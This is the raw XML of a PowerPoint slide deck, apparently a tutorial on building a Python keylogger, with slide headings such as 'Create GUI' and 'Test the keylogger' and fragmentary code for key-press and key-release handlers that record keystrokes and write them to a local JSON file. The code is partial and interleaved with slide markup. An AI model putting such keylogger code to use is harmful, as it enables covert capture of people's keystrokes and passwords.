            </a:pP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startAt="5"/>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Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.</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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104417824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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="380989" y="477168"/>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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205975647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1" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="218429" y="-43123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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955278" cy="4667901"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31594781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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-42707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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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67" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="563231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Initialize the variables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flag = False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 =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on_press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on_press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global flag,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keys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if flag == False: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keys_used.append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{'Pressed': f'{key}'}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flag = True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if flag == True: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keys_used.append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{'Held': f'{key}'}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68352091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1" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-42707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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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72" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="507831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on_release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on_release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global flag,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keys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keys_used.append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{'Released': f'{key}'}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if flag == True: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flag = False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keys = keys + str(key)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generate_json_file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generate_json_file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with open('</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key_log.json</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wb</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as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key_log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key_list_bytes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json.dumps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).encode()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key_log.write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key_list_bytes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031103158"/>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25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-05T01:09:59Z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